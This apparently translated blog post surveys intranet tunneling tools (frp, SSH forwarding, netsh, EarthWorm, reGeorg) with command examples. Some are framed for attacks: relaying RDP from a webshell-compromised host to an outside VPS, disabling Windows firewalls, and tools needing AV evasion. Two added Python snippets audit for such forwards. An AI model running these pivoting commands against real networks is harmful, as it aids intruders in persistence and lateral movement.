Commonly used intranet tunneling (NAT traversal) tools

frp

project address

https://github.com/fatedier/frp/

Brief introduction

  • frp is a high-performance reverse proxy that can be used for intranet penetration (NAT traversal). It supports the TCP and UDP protocols, provides additional capabilities for the HTTP and HTTPS application protocols, and has experimental support for point-to-point penetration.
  • Cross-platform: supports Linux, Windows and macOS.
  • Similar to ngrok. Operations staff and developers often use it to manage and debug programs on machines inside their own network, for example forwarding internal port 22 or 3389 to the public network, or forwarding a locally developed web service to the public network for debugging. An msf/RAT remote-control session can also be brought online through it. It can replace the "Netcom" service that was popular a few years ago.
  • Advantages: no AV evasion is needed, and encrypted transmission is supported.

Basic Usage

  • Deploy frps on a VPS with a public IP, then run frpc on the client machine inside the internal network (the target machine, which can reach the public server). The target machine's ports are forwarded to the public server according to the configuration. There are also free and paid frp services online, so you do not have to deploy your own server.

  • A simple example:
    Both the server and the client can be configured with an ini file or run directly from the command line; the example below uses the command line.

    Server: ./frps -p <server listening port> -t <token>
    Client: ./frpc tcp -s <server ip>:<server port> -r <port to listen on the server> -i <intranet address> -l <intranet port> -t <token> --ue --uc

    --ue and --uc enable encryption and compression respectively (use_encryption and use_compression).

    For example, to forward port 3389 of a machine on which you have a webshell:

    Your machine: ./frps -p 7890 -t woshitoken
    Webshell: frpc.exe tcp -s 1.1.1.1:7890 -r 9999 -i 127.0.0.1 -l 3389 -t woshitoken --ue --uc

    Now connecting to port 9999 on your machine reaches port 3389 on the target machine.

  • See the GitHub project for more usage parameters.


SSH

Brief introduction

  • SSH automatically encrypts and decrypts all network data between the SSH client and the server. At the same time, SSH provides another very useful feature: port forwarding.

  • Advantages: built into Linux, encrypted transmission, supports SOCKS proxy.

Usage Example

Related parameters:

-C: compress the transmitted data.
-f: go to the background after authenticating (user/password); usually used together with -N, so no login shell is opened on the remote host.
-N: do not execute remote commands or scripts; usually used together with -f.
-g: with -L/-R/-D, allow remote hosts to connect to the forwarded port; without it, only the local host can connect.
-L: local forwarding
-R: remote forwarding
-D: dynamic forwarding, i.e. a SOCKS proxy
Local forwarding (creates a local listener)

ssh -C -f -N -g -L <local listen ip>:<local port>:<remote ip>:<remote port> username@<target ip> -p <ssh port>
ssh -C -f -N -g -L 0.0.0.0:1234:192.168.1.100:3389 <user>@<target ip> -p 22

Remote forwarding (creates a remote listener)

ssh -C -f -N -g -R <remote ip>:<remote port>:<local ip>:<local port> username@<target ip> -p <ssh port>
ssh -C -f -N -g -R 0.0.0.0:1234:192.168.5.2:3389 <user>@<target ip> -p 22

Note: if the remote side does not end up listening on 0.0.0.0, use one of the following two methods:

1. Edit the SSH server configuration /etc/ssh/sshd_config, set the GatewayPorts entry to yes, then restart sshd so that it listens on 0.0.0.0.

2. Use rinetd to forward the listener on 127.0.0.1 to 0.0.0.0.

Dynamic forwarding (SOCKS)

ssh -C -f -N -g -D <local ip>:<local port> username@<target ip> -p <ssh port>
ssh -C -f -N -g -D 0.0.0.0:1080 <user>@192.168.2.101 -p 22

This opens a SOCKS proxy on local port 1080, through which the intranet reachable from 192.168.2.101 can be accessed.
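As an added example (not code from the original post), the following Python reads sshd_config text and reports whether a remote forward requested with -R 0.0.0.0:<port> will really listen on all interfaces, which is the situation the GatewayPorts note above addresses. The semantics are those documented in sshd_config(5): the default "no" binds loopback only, "yes" binds the wildcard address, and "clientspecified" lets the client's bind address decide; the sample configs are constructed.

```python
"""Audit helper for the GatewayPorts note above (added example, not the
original post's code). Reads sshd_config text and reports whether an
`ssh -R <bind_addr>:port:host:hostport` listener would be reachable from
other hosts. Assumed semantics, per sshd_config(5): default "no" binds
loopback only, "yes" binds the wildcard address, "clientspecified" lets the
client's bind address decide. The first global directive wins; directives
after a Match block only apply conditionally and are ignored here."""
import re

GATEWAY_RE = re.compile(r"^\s*GatewayPorts\s+(\S+)", re.IGNORECASE)
MATCH_RE = re.compile(r"^\s*Match\b", re.IGNORECASE)
LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def gateway_ports_setting(config_text: str) -> str:
    """Return the effective global GatewayPorts value ('no' when unset)."""
    for line in config_text.splitlines():
        if MATCH_RE.match(line):
            break  # everything after Match is conditional; stop at the global part
        m = GATEWAY_RE.match(line)  # commented-out lines (#GatewayPorts) do not match
        if m:
            return m.group(1).lower()
    return "no"


def remote_forward_exposed(config_text: str, bind_addr: str) -> bool:
    """True if the -R listener would bind a non-loopback address."""
    setting = gateway_ports_setting(config_text)
    if setting == "yes":
        return True  # sshd binds the wildcard address regardless of the request
    if setting == "clientspecified":
        return bind_addr.strip() not in LOOPBACK  # "0.0.0.0" or "*" exposes it
    return False  # "no": sshd ignores the requested bind address and uses loopback


# Constructed sample configs (not taken from any real host)
SAMPLE_DEFAULT = "Port 22\n#GatewayPorts no\nPermitRootLogin no\n"
SAMPLE_YES = "Port 22\nGatewayPorts yes\n"
SAMPLE_CLIENT = "GatewayPorts clientspecified\nMatch User bob\n    GatewayPorts no\n"

if __name__ == "__main__":
    for name, cfg in (("default", SAMPLE_DEFAULT), ("yes", SAMPLE_YES), ("client", SAMPLE_CLIENT)):
        print(f"{name}: GatewayPorts={gateway_ports_setting(cfg)} "
              f"exposed_on_0.0.0.0={remote_forward_exposed(cfg, '0.0.0.0')}")
```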


netsh

Brief introduction

  • netsh (Network Shell) is a powerful command-line tool that Windows provides for network configuration.
  • Supports TCP and UDP forward port forwarding and modifying firewall rules; it has no reverse forwarding function and does not support SOCKS.
  • Advantages: built into Windows, supports IPv4 and IPv6.

Usage

  • On XP/2003, install IPv6 first; the machine must be restarted after installation for it to take effect.

    netsh interface ipv6 install

Firewall management

  • The commands differ between XP/2003 and later systems, and the XP/2003 firewall does not distinguish inbound from outbound.

    netsh firewall show state                                  view the firewall status; the output shows which functional modules are enabled or disabled
    netsh firewall set opmode disable                          disable the system firewall
    netsh firewall set opmode enable                           enable the firewall

    netsh firewall add portopening TCP <port number> "Rule name"   allow the given port inbound and outbound
    netsh firewall delete portopening TCP <port number>            remove the rule
  • For systems after 2003, use the following commands:

    netsh advfirewall show allprofiles                         view the firewall status
    netsh advfirewall set allprofiles state on                 turn the firewall on
    netsh advfirewall set allprofiles state off                turn the firewall off

    netsh advfirewall firewall add rule name="Rule name" dir=in action=allow protocol=TCP localport=<port number>    add a rule (dir: in for inbound, out for outbound; action: allow to permit, block to block)
    netsh advfirewall firewall delete rule name="Rule name" dir=in protocol=TCP localport=<port number>           delete the rule
Port forwarding

netsh interface portproxy show all                                                                                      show all forwarding rules that have been set
netsh interface portproxy add v4tov4 listenport=<listening port> connectaddress=<destination ip> connectport=<destination port>   add a v4tov4 forwarding rule
netsh interface portproxy delete v4tov4 listenport=<listening port>                                                     delete the rule
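For host audits, the rules listed by `netsh interface portproxy show all` are worth parsing rather than eyeballing, since they persist across reboots and quietly relay traffic. The Python below is an added example, not code from the original post: it parses that table layout and flags rules whose connect address is not the local machine; SAMPLE_OUTPUT is a constructed imitation of the command's output.

```python
"""Parse `netsh interface portproxy show all` output and flag rules that
forward traffic to another host (added example for host audits, not code
from the original post). The real command prints one table per address
family pair, a header row, a dashed separator, then one rule per line;
SAMPLE_OUTPUT is a constructed imitation of that layout."""
import re
from dataclasses import dataclass
from typing import List

SECTION_RE = re.compile(r"Listen on (ipv[46]):\s+Connect to (ipv[46]):", re.I)
ROW_RE = re.compile(r"^\s*(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")  # addr port addr port
LOOPBACK = {"127.0.0.1", "::1", "localhost"}

@dataclass
class PortProxyRule:
    family: str          # "v4tov4" etc., matching the netsh add/delete subcommand
    listen_addr: str
    listen_port: int
    connect_addr: str
    connect_port: int

    def forwards_off_host(self) -> bool:
        """A target other than loopback means this host relays traffic elsewhere."""
        return self.connect_addr not in LOOPBACK

def parse_portproxy(text: str) -> List[PortProxyRule]:
    rules: List[PortProxyRule] = []
    family = None
    for line in text.splitlines():
        sec = SECTION_RE.search(line)
        if sec:  # "ipv4"/"ipv6" -> "v4"/"v6", giving e.g. "v4tov6"
            family = f"{sec.group(1)[2:]}to{sec.group(2)[2:]}".lower()
            continue
        m = ROW_RE.match(line)
        if m and family:  # header and dashed rows fail the \d+ port match
            rules.append(PortProxyRule(family, m.group(1), int(m.group(2)),
                                       m.group(3), int(m.group(4))))
    return rules

def suspicious_rules(text: str) -> List[PortProxyRule]:
    return [r for r in parse_portproxy(text) if r.forwards_off_host()]

SAMPLE_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
*               9999        10.0.0.5        3389
0.0.0.0         8080        127.0.0.1       80
"""

if __name__ == "__main__":
    for r in suspicious_rules(SAMPLE_OUTPUT):
        print(f"{r.family} {r.listen_addr}:{r.listen_port} -> {r.connect_addr}:{r.connect_port}")
```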

ew (EarthWorm)

project address

https://github.com/rootkiter/EarthWorm

https://github.com/rootkiter/EarthWorm/blob/master/server/download/ew.zip

Brief introduction

  • Supports forward and reverse TCP port forwarding, similar to lcx (htran)
  • Supports reverse SOCKS proxy
  • Disadvantages: traffic is not encrypted, and AV evasion is needed

Brief usage

-l    local port to listen on
-f    IP to actively connect to
-g    port to actively connect to
-d    IP to call back (rebound) to
-e    port to call back (rebound) to
-s    operating mode

The following modes are supported:
lcx_tran     forward TCP port forwarding, listens locally
lcx_slave    reverse TCP forwarding, client side
lcx_listen   reverse TCP forwarding, server side
ssocksd      create a forward SOCKS proxy server that listens locally and proxies out directly from the current environment
rssocks      create a reverse SOCKS proxy server
rcsocks      reverse SOCKS proxy client

reGeorg&ABPTTS

project address

https://github.com/sensepost/reGeorg

https://github.com/nccgroup/ABPTTS

Brief introduction

Both are HTTP tunnels for web applications and are simple to use; see the GitHub projects for details.


reGeorg has not been tested successfully.

SSH is very convenient to use; I generally use it to open a proxy and map msf.


Source: www.cnblogs.com/anbuxuan/p/11778483.html